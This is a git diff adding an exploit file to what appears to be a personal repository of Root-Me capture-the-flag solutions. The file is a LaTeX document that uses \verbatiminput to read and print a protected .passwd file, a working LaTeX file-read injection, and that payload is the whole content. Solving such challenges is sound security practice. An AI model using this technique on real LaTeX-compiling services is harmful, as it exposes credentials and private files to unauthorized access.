diff --git a/rootme/challenges/app - script/LaTeX - Input/exploit.tex b/rootme/challenges/app - script/LaTeX - Input/exploit.tex new file mode 100644 index 0000000..5f83183 --- /dev/null +++ b/rootme/challenges/app - script/LaTeX - Input/exploit.tex @@ -0,0 +1,7 @@ +\documentclass{article} +\usepackage{verbatim} + +\begin{document} +passwd : +\verbatiminput{/challenge/app-script/ch23/.passwd} +\end{document}